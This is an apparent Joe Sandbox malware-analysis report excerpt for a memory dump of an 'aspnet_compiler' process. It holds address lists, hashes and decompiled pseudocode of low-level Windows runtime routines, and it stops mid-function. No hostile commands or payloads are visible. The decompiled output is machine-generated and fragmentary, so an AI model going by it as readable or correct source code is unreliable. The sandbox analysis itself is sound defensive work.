0x012b4e47
0x012b4e5b
0x012b4e61
0x012b4e67
0x012b4e69
0x012b4e71
0x012b4e73
0x01270500
0x01270500
0x01270500
0x012704fa
0x01270508
0x0127051d
0x0127051d
0x0127051f
0x01270524
0x00000000
0x01270524
0x01270515
0x01270517
0x012b4e7a
0x012b4e7c
0x00000000
0x00000000
0x012b4e85
0x00000000
0x012b4e85
0x00000000
0x01270517

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 83ca713dcd32c9eda48e7d5c1fdef0a17b382494ff2e7c4920d5d7ab07626fe8
Instruction ID: a73c4dea0caec96546fd3cfcc6843f7e1224fc770974fdeca773002a9cf2d9dd
Opcode Fuzzy Hash: 83ca713dcd32c9eda48e7d5c1fdef0a17b382494ff2e7c4920d5d7ab07626fe8
Instruction Fuzzy Hash: 0C915831E202569FEB31AB6CC884BFE7BA4EB02764F050265FB12A72D2D7749D44C785

Uniqueness

Uniqueness Score: -1.00%

Function 0124C600 Relevance: .2, Instructions: 225
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E0124C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
				signed int _v8;
				char _v1036;
				signed int _v1040;
				char _v1048;
				signed int _v1052;
				signed char _v1056;
				void* _v1058;
				char _v1060;
				signed int _v1064;
				void* _v1068;
				intOrPtr _v1072;
				void* _v1084;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t70;
				intOrPtr _t72;
				signed int _t74;
				intOrPtr _t77;
				signed int _t78;
				signed int _t81;
				void* _t101;
				signed int _t102;
				signed int _t107;
				signed int _t109;
				signed int _t110;
				signed char _t111;
				signed int _t112;
				signed int _t113;
				signed int _t114;
				intOrPtr _t116;
				void* _t117;
				char _t118;
				void* _t120;
				char _t121;
				signed int _t122;
				signed int _t123;
				signed int _t125;

				_t125 = (_t123 & 0xfffffff8) - 0x424;
				_v8 =  *0x133d360 ^ _t125;
				_t116 = _a4;
				_v1056 = _a16;
				_v1040 = _a24;
				if(E01256D30( &_v1048, _a8) < 0) {
					L4:
					_pop(_t117);
					_pop(_t120);
					_pop(_t101);
					return E0128B640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
				}
				_t70 = _a20;
				if(_t70 >= 0x3f4) {
					_t121 = _t70 + 0xc;
					L19:
					_t107 =  *( *[fs:0x30] + 0x18);
					__eflags = _t107;
					if(_t107 == 0) {
						L60:
						_t68 = 0xc0000017;
						goto L4;
					}
					_t72 =  *0x1337b9c; // 0x0
					_t74 = L01264620(_t107, _t107, _t72 + 0x180000, _t121);
					_v1064 = _t74;
					__eflags = _t74;
					if(_t74 == 0) {
						goto L60;
					}
					_t102 = _t74;
					_push( &_v1060);
					_push(_t121);
					_push(_t74);
					_push(2);
					_push( &_v1048);
					_push(_t116);
					_t122 = E01289650();
					__eflags = _t122;
					if(_t122 >= 0) {
						L7:
						_t114 = _a12;
						__eflags = _t114;
						if(_t114 != 0) {
							_t77 = _a20;
							L26:
							_t109 =  *(_t102 + 4);
							__eflags = _t109 - 3;
							if(_t109 == 3) {
								L55:
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									L59:
									_t122 = 0xc0000024;
									L15:
									_t78 = _v1052;
									__eflags = _t78;
									if(_t78 != 0) {
										L012677F0( *( *[fs:0x30] + 0x18), 0, _t78);
									}
									_t68 = _t122;
									goto L4;
								}
								_t110 = _v1056;
								_t118 =  *((intOrPtr*)(_t102 + 8));
								_v1060 = _t118;
								__eflags = _t110;
								if(_t110 == 0) {
									L10:
									_t122 = 0x80000005;
									L11:
									_t81 = _v1040;
									__eflags = _t81;
									if(_t81 == 0) {
										goto L15;
									}
									__eflags = _t122;
									if(_t122 >= 0) {
										L14:
										 *_t81 = _t118;
										goto L15;
									}
									__eflags = _t122 - 0x80000005;
									if(_t122 != 0x80000005) {
										goto L15;
									}
									goto L14;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t77;
								if( *((intOrPtr*)(_t102 + 8)) > _t77) {
									goto L10;
								}
								_push( *((intOrPtr*)(_t102 + 8)));
								_t59 = _t102 + 0xc; // 0xc
								_push(_t110);
								L54:
								E0128F3E0();
								_t125 = _t125 + 0xc;
								goto L11;
							}
							__eflags = _t109 - 7;
							if(_t109 == 7) {
								goto L55;
							}
							_t118 = 4;
							__eflags = _t109 - _t118;
							if(_t109 != _t118) {
								__eflags = _t109 - 0xb;
								if(_t109 != 0xb) {
									__eflags = _t109 - 1;
									if(_t109 == 1) {
										__eflags = _t114 - _t118;
										if(_t114 != _t118) {
											_t118 =  *((intOrPtr*)(_t102 + 8));
											_v1060 = _t118;
											__eflags = _t118 - _t77;
											if(_t118 > _t77) {
												goto L10;
											}
											_push(_t118);
											_t56 = _t102 + 0xc; // 0xc
											_push(_v1056);
											goto L54;
										}
										__eflags = _t77 - _t118;
										if(_t77 != _t118) {
											L34:
											_t122 = 0xc0000004;
											goto L15;
										}
										_t111 = _v1056;
										__eflags = _t111 & 0x00000003;
										if((_t111 & 0x00000003) == 0) {
											_v1060 = _t118;
											__eflags = _t111;
											if(__eflags == 0) {
												goto L10;
											}
											_t42 = _t102 + 0xc; // 0xc
											 *((intOrPtr*)(_t125 + 0x20)) = _t42;
											_v1048 =  *((intOrPtr*)(_t102 + 8));
											_push(_t111);
											 *((short*)(_t125 + 0x22)) =  *((intOrPtr*)(_t102 + 8));
											_push(0);
											_push( &_v1048);
											_t122 = E012813C0(_t102, _t118, _t122, __eflags);
											L44:
											_t118 = _v1072;
											goto L11;
										}
										_t122 = 0x80000002;
										goto L15;
									}
									_t122 = 0xc0000024;
									goto L44;
								}
								__eflags = _t114 - _t109;
								if(_t114 != _t109) {
									goto L59;
								}
								_t118 = 8;
								__eflags = _t77 - _t118;
								if(_t77 != _t118) {
									goto L34;
								}
								__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
								if( *((intOrPtr*)(_t102 + 8)) != _t118) {
									goto L34;
								}
								_t112 = _v1056;
								_v1060 = _t118;
								__eflags = _t112;
								if(_t112 == 0) {
									goto L10;
								}
								 *_t112 =  *((intOrPtr*)(_t102 + 0xc));
								 *((intOrPtr*)(_t112 + 4)) =  *((intOrPtr*)(_t102 + 0x10));
								goto L11;
							}
							__eflags = _t114 - _t118;
							if(_t114 != _t118) {
								goto L59;
							}
							__eflags = _t77 - _t118;
							if(_t77 != _t118) {
								goto L34;
							}
							__eflags =  *((intOrPtr*)(_t102 + 8)) - _t118;
							if( *((intOrPtr*)(_t102 + 8)) != _t118) {
								goto L34;
							}
							_t113 = _v1056;
							_v1060 = _t118;
							__eflags = _t113;
							if(_t113 == 0) {
								goto L10;
							}
							 *_t113 =  *((intOrPtr*)(_t102 + 0xc));
							goto L11;
						}
						_t118 =  *((intOrPtr*)(_t102 + 8));
						__eflags = _t118 - _a20;
						if(_t118 <= _a20) {
							_t114 =  *(_t102 + 4);
							_t77 = _t118;
							goto L26;
						}
						_v1060 = _t118;
						goto L10;
					}
					__eflags = _t122 - 0x80000005;
					if(_t122 != 0x80000005) {
						goto L15;
					}
					L012677F0( *( *[fs:0x30] + 0x18), 0, _t102);
					L18:
					_t121 = _v1060;
					goto L19;
				}
				_push( &_v1060);
				_push(0x400);
				_t102 =  &_v1036;
				_push(_t102);
				_push(2);
				_push( &_v1048);
				_push(_t116);
				_t122 = E01289650();
				if(_t122 >= 0) {
					__eflags = 0;
					_v1052 = 0;
					goto L7;
				}
				if(_t122 == 0x80000005) {
					goto L18;
				}
				goto L4;
			}

0x0124c608
0x0124c615
0x0124c625
0x0124c62d
0x0124c635
0x0124c640
0x0124c680
0x0124c687
0x0124c688
0x0124c689
0x0124c694
0x0124c694
0x0124c642
0x0124c64a
0x0124c697
0x012b7a25
0x012b7a2b
0x012b7a2e
0x012b7a30
0x012b7bea
0x012b7bea
0x00000000
0x012b7bea
0x012b7a36
0x012b7a43
0x012b7a48
0x012b7a4c
0x012b7a4e
0x00000000
0x00000000
0x012b7a58
0x012b7a5a
0x012b7a5b
0x012b7a5c
0x012b7a5d
0x012b7a63
0x012b7a64
0x012b7a6a
0x012b7a6c
0x012b7a6e
0x012b79cb
0x012b79cb
0x012b79ce
0x012b79d0
0x012b7a98
0x012b7a9b
0x012b7a9b
0x012b7a9e
0x012b7aa1
0x012b7bbe
0x012b7bbe
0x012b7bc0
0x012b7be0
0x012b7be0
0x012b7a01
0x012b7a01
0x012b7a05
0x012b7a07
0x012b7a15
0x012b7a15
0x012b7a1a
0x00000000
0x012b7a1a
0x012b7bc2
0x012b7bc6
0x012b7bc9
0x012b7bcd
0x012b7bcf
0x012b79e6
0x012b79e6
0x012b79eb
0x012b79eb
0x012b79ef
0x012b79f1
0x00000000
0x00000000
0x012b79f3
0x012b79f5
0x012b79ff
0x012b79ff
0x00000000
0x012b79ff
0x012b79f7
0x012b79fd
0x00000000
0x00000000
0x00000000
0x012b79fd
0x012b7bd5
0x012b7bd8
0x00000000
0x00000000
0x012b7ba9
0x012b7bac
0x012b7bb0
0x012b7bb1
0x012b7bb1
0x012b7bb6
0x00000000
0x012b7bb6
0x012b7aa7
0x012b7aaa
0x00000000
0x00000000
0x012b7ab2
0x012b7ab3
0x012b7ab5
0x012b7aec
0x012b7aef
0x012b7b25
0x012b7b28
0x012b7b62
0x012b7b64
0x012b7b8f
0x012b7b92
0x012b7b96
0x012b7b98
0x00000000
0x00000000
0x012b7b9e
0x012b7b9f
0x012b7ba3
0x00000000
0x012b7ba3
0x012b7b66
0x012b7b68
0x012b7ae2
0x012b7ae2
0x00000000
0x012b7ae2
0x012b7b6e
0x012b7b72
0x012b7b75
0x012b7b81
0x012b7b85
0x012b7b87
0x00000000
0x00000000
0x012b7b31
0x012b7b34
0x012b7b3c
0x012b7b45
0x012b7b46
0x012b7b4f
0x012b7b51
0x012b7b57
0x012b7b59
0x012b7b59
0x00000000
0x012b7b59
0x012b7b77
0x00000000
0x012b7b77
0x012b7b2a
0x00000000
0x012b7b2a
0x012b7af1
0x012b7af3
0x00000000
0x00000000
0x012b7afb
0x012b7afc
0x012b7afe
0x00000000
0x00000000
0x012b7b00
0x012b7b03
0x00000000
0x00000000
0x012b7b05
0x012b7b09
0x012b7b0d
0x012b7b0f
0x00000000
0x00000000
0x012b7b18
0x012b7b1d
0x00000000
0x012b7b1d
0x012b7ab7
0x012b7ab9
0x00000000
0x00000000
0x012b7abf
0x012b7ac1
0x00000000
0x00000000
0x012b7ac3
0x012b7ac6
0x00000000
0x00000000
0x012b7ac8
0x012b7acc
0x012b7ad0
0x012b7ad2
0x00000000
0x00000000
0x012b7adb
0x00000000
0x012b7adb
0x012b79d6
0x012b79d9
0x012b79dc
0x012b7a91
0x012b7a94
0x00000000
0x012b7a94
0x012b79e2
0x00000000
0x012b79e2
0x012b7a74
0x012b7a7a
0x00000000
0x00000000
0x012b7a8a
0x012b7a21
0x012b7a21
0x00000000
0x012b7a21
0x0124c650
0x0124c651
0x0124c656
0x0124c65c
0x0124c65d
0x0124c663
0x0124c664
0x0124c66a
0x0124c66e
0x012b79c5
0x012b79c7
0x00000000
0x012b79c7
0x0124c67a
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85a9e97be852db56c328631e2c449df3edf6969ef7076b6d30ff7e7e6a3b8fcd
Instruction ID: 850680aab9d5faa85dd46014626243eebf1cd2751752a1e2438c1d8a44176efa
Opcode Fuzzy Hash: 85a9e97be852db56c328631e2c449df3edf6969ef7076b6d30ff7e7e6a3b8fcd
Instruction Fuzzy Hash: A08195756646028FDB26CE58C8C1ABBB7E4FBC4394F14485AEF459B281E330ED45CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 012DB8D0 Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 39%

			E012DB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x1337b9c; // 0x0
				_t124 = L01264620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E01289800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E012895B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E012895D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L012677F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E01289910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E012895D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x1337b9c; // 0x0
									_t92 = L01264620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E01289910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E0124A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E012DE7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E012DE7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E012895B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}

0x012db8d9
0x012db8e4
0x00000000
0x012db8e6
0x012db8f3
0x012db8f5
0x012db8f5
0x012db8f8
0x012db920
0x012db924
0x012db936
0x012db939
0x012db93d
0x012db948
0x012db9a0
0x012db9a0
0x012db9a4
0x012db9bf
0x012db9c4
0x012db9c6
0x012db9cd
0x012db9d1
0x012dbad4
0x012dbad8
0x012dbada
0x012dbadc
0x012dbadc
0x012dbadf
0x012dbae0
0x012dbae2
0x012dbae4
0x012dbaec
0x012dbaee
0x012dbaf0
0x012dbaf0
0x012dbaec
0x012dbafb
0x012dbafc
0x012dbafe
0x012dbb01
0x012dbb01
0x00000000
0x012dbb06
0x012db9d7
0x012db9db
0x012db9db
0x012db9de
0x012db9de
0x012db9e4
0x012db9e7
0x012db9ea
0x012db9ec
0x012db9ef
0x012db9f3
0x012dba1b
0x012dba1b
0x012dba23
0x012dba24
0x012dba27
0x012dba2a
0x012dba2b
0x012dba2e
0x012dba30
0x012dba37
0x012dba3f
0x012dba9c
0x012dbaa2
0x012dbb13
0x012dbb15
0x012dbaae
0x012dbaae
0x012dbab3
0x012dbab5
0x012dbaba
0x012dbac8
0x012dbac8
0x012dbaba
0x012dbacd
0x012dbacf
0x00000000
0x012dbacf
0x012dbb1a
0x00000000
0x012dbb1c
0x012dbaa7
0x012dbb11
0x00000000
0x012dbb11
0x012dbaa9
0x00000000
0x00000000
0x00000000
0x00000000
0x012dba41
0x012dba41
0x012dba41
0x012dba58
0x012dba5d
0x012dba62
0x00000000
0x00000000
0x012dba64
0x012dba67
0x012dba68
0x012dba69
0x012dba6c
0x012dba6f
0x012dba71
0x012dba78
0x012dba80
0x00000000
0x00000000
0x012dba90
0x012dba90
0x012dba97
0x00000000
0x012dba97
0x012db9f5
0x012db9f7
0x012db9f7
0x012db9fa
0x012dba03
0x012dba07
0x012dba0c
0x012dba10
0x012dba17
0x00000000
0x012db9f7
0x012db9a6
0x012db9a8
0x012db9af
0x012db9b3
0x00000000
0x00000000
0x012db9b9
0x00000000
0x012db9b9
0x012db94d
0x012db98f
0x012db995
0x012db999
0x012db960
0x012db967
0x012db968
0x012db96a
0x00000000
0x012db96a
0x012db99b
0x012db99e
0x00000000
0x00000000
0x00000000
0x012db99e
0x012db951
0x012db954
0x012db95a
0x012db95e
0x012db972
0x012db979
0x012db97d
0x012db97f
0x012db980
0x012db982
0x012db984
0x00000000
0x012db984
0x00000000
0x012db926
0x00000000
0x012db926

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 74bbed1cadc2c66618175cb4aa98de3c7048b0c68b52ae682fb95bfd99b50444
Instruction ID: f39a51f9b5390dfc9c5701e66875ca7110090a0b97825244082fd1f2315dbab2
Opcode Fuzzy Hash: 74bbed1cadc2c66618175cb4aa98de3c7048b0c68b52ae682fb95bfd99b50444
Instruction Fuzzy Hash: 3B712332260702EFEB32DF18C865F66BBE5EB46720F124528E755876E0DB74E940CB50

Uniqueness

Uniqueness Score: -1.00%

Function 012C6DC9 Relevance: .2, Instructions: 199
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E012C6DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L01264620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E012C6B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E01267D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E01289AE0();
					_t87 = L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E012C795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E012C795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E012C795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E012C795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L01264620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E012C6B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E012C6B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E012C6B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E012C6B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E01267D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E01289AE0();
								L012677F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L01262400( &_v36);
							if(_v24 >= 0) {
								_t87 = L01262400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L01262400( &_v52);
							}
							if(_v28 >= 0) {
								return L01262400( &_v60);
							}
						}
					}
				}
				return _t87;
			}

0x012c6dd4
0x012c6dde
0x012c6de1
0x012c6de3
0x012c6de6
0x012c6de9
0x012c6dec
0x012c6def
0x012c6df2
0x012c6df5
0x012c6dfe
0x012c6e04
0x012c6e09
0x012c6e0d
0x012c6e18
0x012c6e1b
0x012c6e22
0x012c6e2d
0x012c6e30
0x012c6e36
0x012c6e42
0x012c6e4d
0x012c6e50
0x012c6e55
0x012c6e5c
0x012c6e6e
0x012c6e5e
0x012c6e67
0x012c6e67
0x012c6e73
0x012c6e74
0x012c6e77
0x012c6e7c
0x012c6e7d
0x012c6e8e
0x012c6e93
0x012c6e9c
0x012c6ea8
0x012c6eab
0x012c6eac
0x012c6eb3
0x012c6ecd
0x012c6edc
0x012c6ee2
0x012c6ee5
0x012c6ef2
0x012c6efb
0x012c6f01
0x012c6f06
0x012c6f0b
0x012c6f11
0x012c6f1a
0x012c6f22
0x012c6f26
0x012c6f26
0x012c6f33
0x012c6f41
0x012c6f44
0x012c6f47
0x012c6f54
0x012c6f65
0x012c6f77
0x012c6f7c
0x012c6f82
0x012c6f91
0x012c6f99
0x012c6fa3
0x012c6fae
0x012c6fae
0x012c6fba
0x012c6fbb
0x012c6fbc
0x012c6fc1
0x012c6fc2
0x012c6fd3
0x012c6fd8
0x012c6fd8
0x012c6fdf
0x012c6fe8
0x012c6fee
0x012c6fee
0x012c6ff5
0x012c6ffb
0x012c6ffb
0x012c7004
0x00000000
0x012c700a
0x012c7004
0x012c6eb3
0x012c6e9c
0x012c7015

Memory Dump Source

Source File: 00000001.00000002.458723948.0000000001220000.00000040.00000800.00020000.00000000.sdmp, Offset: 01220000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_1220000_aspnet_compiler.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction ID: 5c266897f9b68d116155c6a4eba0d2e4afde88c9b90d75f44b313ca5d72069b0
Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
Instruction Fuzzy Hash: 31717071A1020AEFDB11DFA8C984EEEBBB9FF48714F104569E605E7290D734EA41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 012452A5 Relevance: .2, Instructions: 161
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E012452A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E0125EEF0(0x13379a0);
					_t104 =  *0x1338210; // 0xdf2d18
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E0125EB70(_t93, 0x13379a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E01289890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E0125EEF0(0x13379a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E0125EB70(0, 0x13379a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0xdf2d25
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E0127F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E0125EEF0(0x13379a0);
									__eflags =  *0x1338210 - _t104; // 0xdf2d18
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x1338210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E012C4888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E0125EB70(_t95, 0x13379a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E012895D0();
